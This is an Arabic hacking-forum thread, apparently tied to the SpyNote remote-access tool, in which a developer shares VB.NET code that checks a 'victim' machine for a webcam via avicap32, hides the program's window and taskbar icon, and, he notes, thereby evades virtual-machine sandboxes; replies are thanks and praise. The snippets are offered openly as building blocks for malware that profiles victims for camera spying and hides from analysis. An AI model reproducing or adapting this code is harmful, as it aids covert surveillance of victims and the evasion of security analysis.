1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    681
    الإعجابات المتلقاة:
    725
    نقاط الجائزة:
    515
    الإقامة:
    sa
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Java
    [​IMG]




    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    السلام عليكم ....كود بسيط بدوت نت تحقق من كام الضحيه لو الضحيه يوجد بجهازه كام يشتغل الشرط او العكس لو تبغاء ضحايا ماعندها كام أنت بكيفك !$_@ انا افضل ضحايا بدون كام أنت شو تفضل ؟ ((هههههههههههه)) )4:"​



    هاذا Function
    كود:
        Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, _
                                                                     ByVal lpszName As String, ByVal CbName As Integer, ByVal lpszVer As String, _
                                                                     ByVal cbVer As Integer) As Boolean
        Public Function Camera() As Boolean
            Try
                Dim d As String = Space(100)
                For i As Integer = 0 To 4
                    If capGetDriverDescriptionA(i, d, 100, Nothing, 100) Then
                        Return True
                    End If
                Next
            Catch ex As Exception
            End Try
            Return False
        End Function
    وهاذا الكود تضعه في Form1_Load
    او تضعه في Button1 الي يريحك :ُeُ!e1:​
    كود:
            If Camera() = True Then
                MsgBox("Camera=Yss")
            Else
                MsgBox("Camera=No")
            End If


    وهاذا كــود زياده على الطبخه اخفاء الفورم :cًoُnُfuُseٌd:​
    كود:
            '' اخفاء الفورم 
            Me.Hide()
            Me.ShowIcon = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0
            Me.ShowInTaskbar = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0




    وهاذا شررح للي مافهم شي:ُeُeX:​


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
     
    جاري تحميل الصفحة...
  2. ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    681
    الإعجابات المتلقاة:
    725
    نقاط الجائزة:
    515
    الإقامة:
    sa
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Java
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    نسيت أذكر ان بأمكانــك تخطي الانظمة الوهميه بنفس الكود لن الانظمة الوهميه بدون كام {1!$1}
     
  3. rebih
    Developer

    عضو منذ:
    ‏11 مايو 2014
    عدد المشاركات:
    91
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows xp
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكووور ابدعت [​IMG]لا تحرمنا من جديد ك
     
  4. ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    681
    الإعجابات المتلقاة:
    725
    نقاط الجائزة:
    515
    الإقامة:
    sa
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Java
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    اهلا بيك اخي الغالي&:":&:":
     
  5. ♥IRAQ♥ Abo Ameer
    DeveloPer Plus

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    156
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    50
    الوظيفة:
    مهندس معماري
    الإقامة:
    ارض الحسين
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكور على الطرح ابدعت وجيد جدا
     
  6. Janet CHaldean مشرفه أقسام التصميم والجرافيكس
    V • I • P

    عضو منذ:
    ‏5 يناير 2015
    عدد المشاركات:
    492
    الإعجابات المتلقاة:
    1,237
    نقاط الجائزة:
    515
    الجنس:
    أنثى
    الوظيفة:
    Diplomacy
    الإقامة:
    Kingdom of Norway
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت الايادي
     
  7. ȤōŘϴ
    DeveloPer Plus

    عضو منذ:
    ‏24 أكتوبر 2014
    عدد المشاركات:
    296
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك :{14}:
     
  8. Mr-TiGeR9
    rank
    Developer

    عضو منذ:
    ‏25 مارس 2015
    عدد المشاركات:
    4
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مآ شآء الله , مآ شآء الله ~

    جمييل جمييل ~


    ً#ٌ5oًًًُ.
     
  9. المعاقب الصدري
    طاقم الإدارة

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    912
    الإعجابات المتلقاة:
    681
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مبدع سكريم :{1!}:
     
  10. Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB
    مشرفات المنتدى

    عضو منذ:
    ‏1 ابريل 2015
    عدد المشاركات:
    225
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...